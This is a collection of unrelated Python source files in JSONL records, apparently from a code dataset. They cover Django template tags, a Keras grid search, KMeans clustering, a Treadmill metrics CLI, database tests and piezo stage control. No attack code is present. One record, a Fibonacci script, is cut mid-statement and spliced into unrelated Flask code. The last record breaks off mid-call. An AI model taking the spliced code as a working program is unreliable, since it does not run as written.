+{"seq_id":"42258061","text":"from django import template\nfrom newItem.models import Image\n\nregister = template.Library()\n\n\ndef imageMini(productid):\n\tallImage = Image.objects.all()\n\tallImage = allImage.filter(numberProduct = productid)\n\timage = allImage[0]\n\treturn image.link\n\t\nregister.filter('imageMini', imageMini)","sub_path":"newtags/templatetags/imgTags.py","file_name":"imgTags.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"163748789","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport pandas as pd\nfrom time import time\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\nfrom tensorflow.python.keras.wrappers.scikit_learn import KerasClassifier\nfrom tensorflow.python.keras.callbacks import TensorBoard\nfrom sklearn.metrics import classification_report\n\n# PARAMETERIZED DL NN\ndef parameterized_deep_net(loss=None,\n optimizer=None,\n metrics=None,\n batch_size=None,\n epochs=None,\n validation_split=None,\n steps_per_epoch=None,\n use_multiprocessing=True):\n model = keras.Sequential()\n model.add(keras.layers.Dense(4, activation=tf.nn.relu))\n model.add(keras.layers.Dense(4, activation=tf.nn.relu))\n model.add(keras.layers.Dense(2, activation=tf.nn.softmax))\n model.compile(optimizer=optimizer, loss=loss, metrics=metrics)\n return model\n\n# GATHER DATA\ntrain, val = train_test_split(\n pd.read_csv(\"titanic_imputed_1_hot_encd_norml.csv\", sep=\",\").\n query(expr='Survived > -1'),\n test_size=0.35)\n\nX_train = train[['Pclass', 'Age', 'SibSp', 'Parch', 'Fare', 'is_male', 'embark_C', 'embark_Q']].values\ny_train = train[['Survived']].values\n\nX_val = val[['Pclass', 'Age', 'SibSp', 'Parch', 'Fare', 'is_male', 'embark_C', 'embark_Q']].values\ny_val = val[['Survived']].values\ndel val, train\n\n\n# TEST MODEL METHOD\ndef test_parameterized_tf_nn():\n batch_size = 10\n epochs = 10\n validation_split = 0.3\n use_multiprocessing = True\n steps_per_epoch = 10\n tensorboard_log = 'tb_logs'\n tensorboard_name = '6. Grid Search NB'\n\n model = parameterized_deep_net(X_train, y_train, X_val, y_val,\n batch_size=batch_size,\n epochs=epochs,\n validation_split=validation_split,\n steps_per_epoch=steps_per_epoch,\n use_multiprocessing=use_multiprocessing,\n tensorboard_log=tensorboard_log,\n tensorboard_name=tensorboard_name)\n# test_parameterized_tf_nn()\n\n# GRID SEARCHING\nbatch_size = [5, 7]\nepochs = [5, 7]\nuse_multiprocessing = [True]\nsteps_per_epoch = [5, 7]\nmetrics = [['accuracy']]\noptimizer = ['adam']\nloss = ['sparse_categorical_crossentropy']\n\nparam_grid = dict(batch_size=batch_size,\n epochs=epochs,\n use_multiprocessing=use_multiprocessing,\n steps_per_epoch=steps_per_epoch,\n metrics=metrics,\n loss=loss,\n optimizer=optimizer)\n\nscoring = {'AUC': 'roc_auc', 'Accuracy': 'accuracy', 'Balanced Accuracy': 'balanced_accuracy'}\n\ntf_nn = KerasClassifier(build_fn=parameterized_deep_net, verbose=1)\nclf = GridSearchCV(estimator=tf_nn,\n param_grid=param_grid,\n n_jobs=10,\n cv=3,\n scoring=scoring,\n refit='AUC',\n return_train_score=True)\n# https://scikit-learn.org/stable//modules/model_evaluation.html\ngrid_result = clf.fit(X_train, y_train)\n\nprint(\"Best parameters set found on development set:\")\nprint()\nprint(clf.best_params_)\nprint()\nprint(\"Grid scores on development set:\")\nprint()\nmeans = clf.cv_results_['mean_test_Accuracy']\nstds = clf.cv_results_['std_test_Accuracy']\nfor mean, std, params in zip(means, stds, clf.cv_results_['params']):\n print(\"%0.3f (+/-%0.03f) for %r\"\n % (mean, std * 2, params))\nprint()\n\nprint(\"Detailed classification report:\")\nprint()\nprint(\"The model is trained on the full development set.\")\nprint(\"The scores are computed on the full evaluation set.\")\nprint()\ny_true, y_pred = y_val, clf.predict(X_val)\nprint(classification_report(y_true, y_pred))\nprint()\n\n# 
######################################################################################################################\n# ######################################################################################################################\n# ######################################################################################################################\n\nMODEL_NAME = \"TITANIC-TF-MODEL-{}\".format(int(time()))  # 'time' is imported as a function above (from time import time)\n\nbatch_size = 10\nepochs = 10\nvalidation_split = 0.3\nuse_multiprocessing = True\nsteps_per_epoch = 10\n\nmodel = parameterized_deep_net(batch_size=batch_size,\n                               epochs=epochs,\n                               validation_split=validation_split,\n                               steps_per_epoch=steps_per_epoch,\n                               use_multiprocessing=use_multiprocessing)\n\n# GRID SEARCH\nmodel = KerasClassifier(build_fn=parameterized_deep_net, verbose=0)\n\nparam_grid = dict(epochs=[1, 3, 5, 7])\ngrid = GridSearchCV(estimator=model, param_grid=param_grid, n_jobs=-1, cv=3, scoring='accuracy')\ngrid_result = grid.fit(X_train, y_train)\n\nexit(0)\n","sub_path":"grid_search_deep_net.py","file_name":"grid_search_deep_net.py","file_ext":"py","file_size_in_byte":5081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"262036058","text":"import pandas\n\nfrom sklearn.cluster import KMeans\nfrom super_dash.signals import register_jsonschema\nfrom mine.algorithm.models import Scatter\n\n\nconfig_schema = {\n \"properties\": {\n \"n_clusters\": {\n \"type\": \"number\",\n \"minimum\": 1,\n },\n \"axis\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"string\",\n }\n }\n },\n \"required\": [\"axis\"]\n}\n\nregister_jsonschema.send(sender=None, schema=config_schema,\n import_path='mine.algorithm.kmeans')\n\n\ndef entry(ds, cfg):\n ds = pandas.read_csv(ds)\n n_clusters = cfg.get('n_clusters')\n if n_clusters:\n kmeans = KMeans(n_clusters=n_clusters)\n else:\n kmeans = KMeans()\n labels = kmeans.fit(ds[cfg['axis']]).labels_\n\n models = []\n for i in range(kmeans.n_clusters):\n scatter = Scatter(cfg.get('name'))\n scatter.label = labels[i]\n models.append(scatter)\n for i_loc, series in ds[cfg['axis']].iterrows():\n models[labels[i_loc]].add(series.tolist())\n return models, kmeans.predict\n","sub_path":"mine/algorithm/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"461592895","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\wsgiserialize\\xmlrpc.py\n# Compiled at: 2006-12-06 22:56:10\nfrom xmlrpclib import dumps\n__all__ = [\n 'WSGIXmlRpc', 'xmlrpc']\n\ndef xmlrpc(application, **kw):\n \"\"\"Decorator for XML-RPC serialization.\"\"\"\n return WsgiXmlRpc(application, **kw)\n\n\nclass WsgiXmlRpc(object):\n \"\"\"WSGI middleware for serializing simple Python objects to XML-RPC.\"\"\"\n __module__ = __name__\n\n def __init__(self, application, **kw):\n self.application = application\n self.response = kw.get('methodresponse')\n self.name = kw.get('methodname')\n self.encoding = kw.get('encoding')\n self.allownone = kw.get('allow_none', 0)\n\n def __call__(self, environ, start_response):\n return [\n dumps(tuple([self.application(environ, start_response)]), self.response, self.name, self.encoding, self.allownone)]","sub_path":"pycfiles/wsgiserialize-0.3-py2.4/xmlrpc.py","file_name":"xmlrpc.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"429195290","text":"\"\"\"Download treadmill app metrics given a pattern or exact app name.\n\nThe files are downloaded to the directory specified by the --outdir command\nline option.\n\"\"\"\n\nimport functools\nimport logging\nimport os\nimport urllib.request\nimport urllib.parse\nimport urllib.error\n\nimport click\n\nfrom treadmill import cli\nfrom treadmill import context\nfrom treadmill import fs\nfrom treadmill import restclient\nfrom treadmill import rrdutils\nfrom treadmill.websocket import client as wsc\n\n_LOGGER = logging.getLogger(__name__)\n\n# TODO: this list should be discoverable from the server rather than\n# hardcoded. GET /metrics/core should return this list.\n_SYSTEM_SERVICES = [\n # Total metrics for non-treadmill (system), core services and all apps.\n 'treadmill.system',\n 'treadmill.core',\n 'treadmill.apps',\n]\n\n\ndef _find_nodeinfo_endpoints(api=None):\n \"\"\"Return all the nodeinfo endpoints in the cell.\n\n The return value is a dict with host-endpoint assigments as key-value\n pairs.\n \"\"\"\n endpoints = _get_endpoints(api)\n return _endpoints_by_hosts(endpoints)\n\n\ndef _get_endpoints(api=None):\n \"\"\"Return all the nodeinfo endpoints for the given cell.\"\"\"\n apis = context.GLOBAL.state_api(api)\n\n url = '/endpoint/{}/tcp/nodeinfo'.format(urllib.parse.quote('root.*'))\n response = restclient.get(apis, url)\n\n endpoints = [{\n 'name': end['name'],\n 'proto': end['proto'],\n 'endpoint': end['endpoint'],\n 'hostport': '{0}:{1}'.format(end['host'], end['port'])\n } for end in response.json()]\n\n if not endpoints:\n cli.bad_exit(\"Nodeinfo API couldn't be found\")\n\n return endpoints\n\n\ndef _endpoints_by_hosts(endpoints):\n \"\"\"Return a dict consisting of the host-endpoint pairs as key-values.\"\"\"\n rv = {}\n for ep in endpoints:\n host, _ = ep['hostport'].split(':')\n rv[host] = ep\n\n return rv\n\n\ndef _get_endpoint_for_host(endpoints, host):\n \"\"\"Return the nodeinfo endpoint running on the host in parameter.\"\"\"\n try:\n rv = endpoints[host]\n except KeyError:\n cli.bad_exit('Nodeinfo endpoint not found on %s', host)\n\n return rv\n\n\ndef _instance_to_host_uniq(in_=None, out_=None, uniq=None):\n \"\"\"Update out_ so it contains 'instance: {host, uniq}' as key: value pairs.\n \"\"\"\n if 'event' not in in_ or not in_['event']:\n return True\n\n if 'uniqueid' not in in_['event'] or in_['event']['uniqueid'] != uniq:\n return True\n\n out_[in_['event']['instanceid']] = in_['event']['source']\n return True\n\n\ndef _find_uniq_instance(instance, uniq, ws_api=None):\n \"\"\"Find out where the given instance/uniq is/has been running.\"\"\"\n rv = {}\n message = {'topic': '/trace', 'filter': instance, 'snapshot': True}\n on_message = functools.partial(_instance_to_host_uniq, out_=rv, uniq=uniq)\n\n wsc.ws_loop(ws_api, message, True, on_message)\n\n return rv\n\n\ndef _instance_to_host(in_=None, out_=None):\n \"\"\"Update out_ so it contains 'instance: host' as key: value pairs.\"\"\"\n if 'host' not in in_:\n return True\n\n out_[in_['name']] = in_['host']\n return True\n\n\ndef _find_running_instance(app, ws_api=None):\n \"\"\"Find the instance name(s) and host(s) corresponding to the application.\n \"\"\"\n rv = {}\n message = {'topic': '/endpoints',\n 'filter': app,\n 'proto': 'tcp',\n 'endpoint': 'ssh',\n 'snapshot': True}\n\n on_message = functools.partial(_instance_to_host, out_=rv)\n\n wsc.ws_loop(ws_api, message, True, on_message)\n\n return rv\n\n\ndef _metrics_url(*name_parts):\n \"\"\"Return the url with which the 
application metrics can be retrieved.\"\"\"\n    return '/metrics/{}'.format(urllib.parse.quote('/'.join(name_parts)))\n\n\ndef _rrdfile(outdir, *fname_parts):\n    \"\"\"Return the full path of the rrd file where the metrics will be saved.\n    \"\"\"\n    return os.path.join(outdir, '-'.join(fname_parts) + '.rrd')\n\n\ndef _get_app_rsrc(instance, admin_api=None, cell_api=None):\n    \"\"\"Return the application's reserved resources from the manifest.\"\"\"\n    try:\n        mf = restclient.get(context.GLOBAL.cell_api(cell_api),\n                            '/instance/%s' % urllib.parse.quote(instance)).json()\n    except restclient.NotFoundError:\n        mf = restclient.get(context.GLOBAL.admin_api(admin_api),\n                            '/app/%s' % instance).json()\n\n    return {rsrc: mf[rsrc] for rsrc in ('cpu', 'disk', 'memory')\n            if rsrc in mf}\n\n\ndef _get_app_metrics(endpoint, instance, timeframe, uniq='running',\n                     outdir=None, cell_api=None):\n    \"\"\"Retrieves app metrics.\"\"\"\n    fs.mkdir_safe(outdir)\n    # pass cell_api by keyword so it does not bind to the admin_api parameter\n    reserved_rsrc = _get_app_rsrc(instance, cell_api=cell_api)\n\n    api = 'http://{}'.format(endpoint['hostport'])\n    _download_rrd(api, _metrics_url(instance, uniq),\n                  _rrdfile(outdir, instance, uniq), timeframe, reserved_rsrc)\n\n\ndef _get_server_metrics(endpoint, server, timeframe, services=None,\n                        outdir=None):\n    \"\"\"Get core services metrics.\"\"\"\n    fs.mkdir_safe(outdir)\n\n    api = 'http://{}'.format(endpoint['hostport'])\n\n    if not services:\n        services = _SYSTEM_SERVICES\n\n    # FIXME: give a default value of system limit\n    # otherwise the command will crash\n    for svc in services:\n        _download_rrd(api, _metrics_url(svc), _rrdfile(outdir, server, svc),\n                      timeframe, {'cpu': '0%', 'disk': '0M', 'memory': '0M'})\n\n\ndef _download_rrd(nodeinfo_url, metrics_url, rrdfile, timeframe,\n                  reserved_rsrc=None):\n    \"\"\"Get rrd file and store in output directory.\"\"\"\n    _LOGGER.info('Download metrics from %s/%s', nodeinfo_url, metrics_url)\n    try:\n        resp = restclient.get(nodeinfo_url, metrics_url, stream=True)\n        with open(rrdfile, 'w+b') as f:\n            for chunk in resp.iter_content(chunk_size=128):\n                f.write(chunk)\n\n        rrdutils.gen_graph(rrdfile, timeframe, rrdutils.RRDTOOL,\n                           reserved_rsrc=reserved_rsrc)\n    except restclient.NotFoundError as err:\n        _LOGGER.error('%s', err)\n        cli.bad_exit('Metrics not found: %s', err)\n    except rrdutils.RRDToolNotFoundError:\n        cli.bad_exit('The rrdtool utility cannot be found in the PATH')\n\n\n# Disable warning about redefined-builtin 'long' in the options\n# pylint: disable=W0622\ndef init():\n    \"\"\"Top level command handler.\"\"\"\n\n    ctx = {}\n\n    @click.group()\n    @click.option('--cell-api',\n                  envvar='TREADMILL_CELLAPI',\n                  help='Cell API url to use.',\n                  required=False)\n    @click.option('--api',\n                  envvar='TREADMILL_STATEAPI',\n                  help='State API url to use.',\n                  required=False)\n    @click.option('--cell',\n                  callback=cli.handle_context_opt,\n                  envvar='TREADMILL_CELL',\n                  expose_value=False,\n                  required=True)\n    @click.option('--outdir',\n                  '-o',\n                  help='Output directory.',\n                  required=True,\n                  type=click.Path(exists=True))\n    @click.option('--ws-api', help='Websocket API url to use.', required=False)\n    def metrics(cell_api, api, outdir, ws_api):\n        \"\"\"Retrieve node / app metrics.\"\"\"\n        ctx['cell_api'] = cell_api\n        ctx['nodeinf_eps'] = _find_nodeinfo_endpoints(api)\n        ctx['outdir'] = outdir\n        ctx['ws_api'] = ws_api\n\n    @metrics.command()\n    @cli.ON_REST_EXCEPTIONS\n    @click.argument('app_pattern')\n    @click.option('--long', is_flag=True, default=False,\n                  help='Metrics for longer timeframe.')\n    def running(app_pattern, long):\n        \"\"\"Get the metrics of running instances.\"\"\"\n        
instances = _find_running_instance(app_pattern, ctx['ws_api'])\n if not instances:\n cli.bad_exit('No running instance matched the pattern.')\n\n _LOGGER.debug('Found instance(s): %s', instances)\n\n timeframe = 'long' if long else 'short'\n for inst, host in instances.items():\n endpoint = _get_endpoint_for_host(ctx['nodeinf_eps'], host)\n _LOGGER.debug(\"getting metrics from endpoint %r\", endpoint)\n\n _get_app_metrics(endpoint, inst, timeframe, outdir=ctx['outdir'],\n cell_api=ctx['cell_api'])\n\n @metrics.command()\n @cli.ON_REST_EXCEPTIONS\n @click.argument('app')\n @click.option('--long', is_flag=True, default=False,\n help='Metrics for longer timeframe.')\n def app(app, long):\n \"\"\"Get the metrics of the application in params.\"\"\"\n instance, uniq = app.split('/')\n if uniq == 'running':\n instances = _find_running_instance(instance, ctx['ws_api'])\n else:\n instances = _find_uniq_instance(instance, uniq, ctx['ws_api'])\n\n if not instances:\n cli.bad_exit('No instance found with the application name.')\n\n _LOGGER.debug('Found instance(s): %s', instances)\n\n timeframe = 'long' if long else 'short'\n for inst, host in instances.items():\n endpoint = _get_endpoint_for_host(ctx['nodeinf_eps'], host)\n _LOGGER.debug(\"getting metrics from endpoint %r\", endpoint)\n\n _get_app_metrics(endpoint, inst, timeframe, uniq,\n outdir=ctx['outdir'], cell_api=ctx['cell_api'])\n\n @metrics.command()\n @cli.ON_REST_EXCEPTIONS\n @click.argument('servers', nargs=-1)\n @click.option('--services', type=cli.LIST, help='Subset of core services.')\n @click.option('--long', is_flag=True, default=False,\n help='Metrics for longer timeframe.')\n def sys(servers, services, long):\n \"\"\"Get the metrics of the server(s) in params.\"\"\"\n timeframe = 'long' if long else 'short'\n for server in servers:\n endpoint = _get_endpoint_for_host(ctx['nodeinf_eps'], server)\n _LOGGER.debug(\"getting metrics from endpoint %r\", endpoint)\n\n _get_server_metrics(endpoint, server, timeframe, services,\n ctx['outdir'])\n\n del running\n del app\n del sys\n\n return metrics\n","sub_path":"treadmill/cli/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":10146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"401067928","text":"import os\nimport mysql.connector\nfrom dotenv import load_dotenv # for python-dotenv method\nload_dotenv() # for python-dotenv method\n\n\ndef connect_to_database():\n # os environments are defined in .env file\n return mysql.connector.connect(host=os.environ.get('HOST'),\n user=os.environ.get('USER'),\n password=os.environ.get('PASSWORD'),\n database=os.environ.get('DATABASE'))\n\n\ndef test_sql_create_color():\n test_val = (\"blue\", \"#123458\")\n\n database = connect_to_database()\n database_cursor = database.cursor()\n\n database_cursor.execute(\"INSERT INTO colors (color_name, hex_value) \\\n VALUES (%s, %s)\", test_val)\n\n assert database_cursor.rowcount == 1\n\n\ndef test_sql_get_all_colors():\n database1 = connect_to_database()\n database_cursor1 = database1.cursor()\n database_cursor1.execute(\"SELECT * FROM colors\")\n expected_rows = len(database_cursor1.fetchall())\n\n database2 = connect_to_database()\n database_cursor2 = database2.cursor()\n database_cursor2.execute(\"SELECT COUNT(*) FROM colors\")\n # comma after actual_rows to unpack tuple of database response\n actual_rows, = database_cursor2.fetchone()\n\n assert expected_rows == actual_rows\n","sub_path":"ai/digimad_backend_ai_io_controller/tests/test_colors.py","file_name":"test_colors.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"246104299","text":"import os\nfrom django.test import SimpleTestCase\nfrom django.test.utils import override_settings\nfrom corehq.apps.app_manager.tests import TestFileMixin\nfrom corehq.apps.userreports.models import CustomDataSourceConfiguration, CustomReportConfiguration\n\n\nclass TestCustomReportConfig(SimpleTestCase, TestFileMixin):\n\n file_path = ('data', 'custom_reports')\n root = os.path.dirname(__file__)\n\n def test_wrap(self):\n wrapped = CustomReportConfiguration.wrap(self.get_json('custom_report_config'))\n self.assertEqual([\"example\", \"dimagi\"], wrapped.domains)\n\n def test_get_all(self):\n with override_settings(CUSTOM_UCR_REPORTS=[self.get_path('custom_report_config', 'json')]):\n all = list(CustomReportConfiguration.all())\n self.assertEqual(2, len(all))\n example, dimagi = all\n self.assertEqual('example', example.domain)\n self.assertEqual('dimagi', dimagi.domain)\n for config in all:\n self.assertEqual('Custom Title', config.title)\n\n def test_production_config(self):\n for data_source in CustomDataSourceConfiguration.all():\n data_source.validate()\n","sub_path":"corehq/apps/userreports/tests/test_custom_reports.py","file_name":"test_custom_reports.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"182966520","text":"#opening the python3 shell\npython3\n\nimport subprocess\nsrc = \"\" # replace with the source directory\ndest = \"\" # replace with the destination directory\n\nsubprocess.call([\"rsync\", \"-arq\", src, dest])\n\n# Exit from the Python shell using exit().","sub_path":"debugging/part2/final_lab/subprocess_rsync_command_line.py","file_name":"subprocess_rsync_command_line.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"469013488","text":"import random\r\n\r\ndef power(a,b):\r\n if b==1:\r\n return a;\r\n elif b==0:\r\n return 1;\r\n elif b%2==0:\r\n return (power(a,b/2)**2);\r\n else:\r\n return (a*power(a,b//2)**2);\r\n\r\nn=int(input(\"Δώσε τον όρο της ακολουθίας Fibonacci: \"));\r\n\r\nif n<=0:\r\n print(\"Σφάλμα! Ο αριθμός που έδωσες είναι μικρότερος του 0\");\r\nelif n==1:\r\n p=0;\r\n print(\"Ο αριθμός είναι πρώτος!\");\r\n\r\nelse:\r\n a=0;\r\n b=1;\r\n c=0;\r\n p=0;\r\n while c')\ndef serve_static(path):\n return send_from_directory('static/', path)\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"119592974","text":"# -*- coding: utf-8 -*-\r\n'''\r\nCreated on 20.09.2019\r\n\r\n@author: yu03\r\n'''\r\nfrom pipython import GCSDevice, datarectools, pitools, gcscommands\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport datetime\r\nfrom File_name_define import PI_name, name\r\n\r\nnow = datetime.datetime.now()\r\n\r\ndef Export_Data(file_name, header, out_str):\r\n print('Writing Data')\r\n with open(file_name,'w') as fid: ######################################################################################\r\n fid.writelines(header)\r\n fid.writelines(out_str)\r\n print('Finish Writing')\r\n return\r\n\r\nCONTROLLERNAME = 'E-712'\r\nSTAGES = None # connect stages to axes\r\nREFMODE = None # reference the connected stages\r\n\r\n'''\r\n Parameters for data recorder\r\n'''\r\nNUMVALUES = 500 # number of data sets to record as integer\r\n# NUMVALUES = 600\r\nRECRATE = 250 # number of recordings per second, i.e. in Hz\r\n\r\n'''\r\n Parameters for Wave Generator\r\n'''\r\nNUMPOINTS = 30000 # number of points for one sine period as integer\r\nSTARTPOS = 0.0 # start position of the circular motion as float for both axes\r\nAMPLITUDE = 1 # amplitude of the circular motion as float for both axes\r\n# AMPLITUDE = 200\r\n# if AMPLITUDE >= 50:\r\n# print('AMPLITUDE TOO LARGE')\r\n# exit()\r\nOFFSET = 0\r\nNUMCYLES = 1 # number of cycles for wave generator output\r\n# TABLERATE = 50 # duration of a wave table point in multiples of servo cycle times as integer\r\nTABLERATE = 1\r\n\r\n'''\r\n Moving Axis define\r\n'''\r\n### 1=x,2=y,3=z_rot,4=z,5=x_rot,6=y_rot\r\n\r\nmoving_axis = 2\r\n\r\nwavegens = (1, 2, 3, 4, 5, 6)\r\nwavetables = (1, 2, 3, 4, 5, 6)\r\n\r\nwith GCSDevice(CONTROLLERNAME) as pidevice:\r\n \r\n '''\r\n Initialization\r\n '''\r\n pidevice.InterfaceSetupDlg()\r\n print('connected: {}'.format(pidevice.qIDN().strip()))\r\n print('initialize connected stages...')\r\n pitools.startup(pidevice, STAGES, REFMODE)\r\n IDN = pidevice.qIDN()\r\n print('IDN: ', IDN)\r\n print('Servo Status: ', pidevice.qSVO())\r\n pidevice.WGO(wavegens, mode=[0]*len(wavegens))\r\n '''\r\n Auto-Zero\r\n '''\r\n# pidevice.ATZ({1:0, 2:0, 4:0})\r\n# time.sleep(5)\r\n '''\r\n Turn on control loop\r\n '''\r\n pidevice.SVO({'1':1,'2':1,'3':1,'4':1,'5':1,'6':1})\r\n# print('Servo Status: ', pidevice.qSVO())\r\n '''\r\n Data Recording Configuration\r\n '''\r\n drec = datarectools.Datarecorder(pidevice)\r\n drec.numvalues = NUMVALUES\r\n drec.samplefreq = RECRATE\r\n print('data recorder rate: {:.2f} Hz'.format(drec.samplefreq))\r\n drec.options = (datarectools.RecordOptions.ACTUAL_POSITION_2)\r\n# drec.sources = ('2', '3', '5') ### 2=y=lenth 3=rot_z=hor_angle, 5=rot_x=ver_angle\r\n# drec.trigsources = datarectools.TriggerSources.POSITION_CHANGING_COMMAND_1\r\n drec.trigsources = datarectools.TriggerSources.TRIGGER_IMMEDIATELY_4\r\n# drec.arm()\r\n print('Data recorder TriggerSource: ', pidevice.qDRT())\r\n \r\n print('Sampling Freq. = ', drec.samplefreq)\r\n# pidevice.RTR(60)\r\n# print('Record Table Rate: ', pidevice.qRTR())\r\n \r\n pidevice.DRC(tables=1, sources='2', options=2)\r\n pidevice.DRC(tables=2, sources='3', options=2)\r\n pidevice.DRC(tables=3, sources='5', options=2)\r\n print('Data recorder configuration: ', pidevice.qDRC())\r\n \r\n \r\n \r\n# pidevice.DRT(tables=0, sources=2, values='0')\r\n# print('Data recorder TriggerSource: ', pidevice.qDRT())\r\n \r\n '''\r\n Wave Generator Configuration\r\n '''\r\n# print('Wave Generator Num. 
', pidevice.qTWG())\r\n# Servo_update_time = pidevice.qSPA(items=1, params=0x0E000200)[1][234881536]### 0x0E000200\r\n# print('Servo update time: /s', Servo_update_time)\r\n \r\n# pidevice.WAV_LIN(table=wavetables[moving_axis-1], firstpoint=1, numpoints=NUMPOINTS, append='X',\r\n# speedupdown=NUMPOINTS//10, amplitude=AMPLITUDE, offset=OFFSET, seglength=NUMPOINTS)\r\n pidevice.WAV_SIN_P(table=wavetables[1], firstpoint=1, numpoints=NUMPOINTS, append='X',\r\n center=NUMPOINTS/2, amplitude=AMPLITUDE, offset=STARTPOS, seglength=NUMPOINTS)\r\n# pidevice.WAV`_RAMP(table=wavetables[moving_axis-1], firstpoint=1, numpoints=NUMPOINTS, append='X', center=NUMPOINTS/2, \r\n# speedupdown=NUMPOINTS//10, amplitude=45, offset=0, seglength=NUMPOINTS)\r\n pidevice.WSL(wavegens, wavetables)\r\n pidevice.WGC(wavegens, [NUMCYLES]*len(wavegens))\r\n pidevice.WTR(0, tablerates=TABLERATE, interpol=1)\r\n \r\n '''\r\n Trigger Configuration\r\n '''\r\n pidevice.TWC()\r\n# for i in range(NUMPOINTS//6+1): ### 50Hz~12 for TABLERATE 25\r\n for i in range(NUMPOINTS//300+1): ### 50Hz~60 for TABLERATE 5\r\n# pidevice.TWS(lines=2, points=1+6*i, switches=1) ### 50Hz~12 for TABLERATE 25\r\n pidevice.TWS(lines=2, points=1+300*i, switches=1) ### 50Hz~60 for TABLERATE 5\r\n \r\n pidevice.CTO(lines=2, params=1, values=0.1)\r\n# pidevice.CTO(lines=2, params=2, values=2)\r\n pidevice.CTO(lines=2, params=3, values=9)\r\n# Trig_conf = pidevice.qCTO()[2] ### Y_axis=2\r\n# Trig_step = Trig_conf[1]\r\n# Trig_line = Trig_conf[2]\r\n# Trig_mode = Trig_conf[3]\r\n# # print(Trig_conf)\r\n# print('Trigger step = ', float(Trig_step))\r\n# print('Trigger line = ', Trig_line)\r\n# print('Trigger mode = ', Trig_mode)\r\n \r\n# print('Data recorder options: ', pidevice.qHDR())\r\n \r\n\r\n# pitools.waitonready(pidevice)\r\n \r\n# Table_rate = pidevice.qSPA(items=1, params=0x13000109)[1][318767369] ###0x13000109\r\n# print(Table_rate)\r\n# print(pidevice.qWTR(wavegens=1))\r\n pitools.waitontarget(pidevice, '%s'%moving_axis)\r\n print('Servo Status: ', pidevice.qSVO())\r\n \r\n '''\r\n Notice the Axis No.2!!!!\r\n '''\r\n pidevice.WGO(wavegens[moving_axis-1], mode=[1])\r\n while any(list(pidevice.IsGeneratorRunning(wavegens[moving_axis-1]).values())):\r\n print ('.')\r\n time.sleep(1.0)\r\n print('done')\r\n pidevice.WGO(wavegens[moving_axis-1], mode=[0])\r\n\r\n# time.sleep(2.0)\r\n# pidevice.WGO(wavegens=1, mode=0)\r\n \r\n '''\r\n Set Target Relative To Current Position\r\n '''\r\n# pidevice.MVR('2', 0.1) ### y = 2\r\n \r\n '''\r\n Get Target Position\r\n '''\r\n# target_position = pidevice.qMOV() \r\n# target_x, target_y, target_z_r, target_z, target_x_r, target_y_r = pidevice.qMOV()['1'],pidevice.qMOV()['2'],pidevice.qMOV()['3'],pidevice.qMOV()['4'],pidevice.qMOV()['5'],pidevice.qMOV()['6']\r\n# print(target_x, target_y, target_z_r, target_z, target_x_r, target_y_r)\r\n \r\n '''\r\n Get Real Position\r\n '''\r\n# pos = pidevice.qPOS()\r\n# pos_x, pos_y, pos_z_r, pos_z, pos_x_r, pos_y_r = pidevice.qMOV()['1'],pidevice.qMOV()['2'],pidevice.qMOV()['3'],pidevice.qMOV()['4'],pidevice.qMOV()['5'],pidevice.qMOV()['6']\r\n# print(pos_x, pos_y, pos_z_r, pos_z, pos_x_r, pos_y_r)\r\n \r\n \r\n \r\n\r\n '''\r\n Data Recording\r\n '''\r\n \r\n# header, data = drec.getdata()\r\n# y_pos, z_rot, x_rot = data[0], data[1], data[2]\r\n \r\n# samp_time = NUMVALUES/RECRATE\r\n# n_data = NUMVALUES\r\n# print('Sampling Rate = ', RECRATE)\r\n# print('Data length = ', n_data)\r\n# print('Time = ', samp_time)\r\n \r\n\r\n header, data = pidevice.qDRR(tables=[1,2,3], 
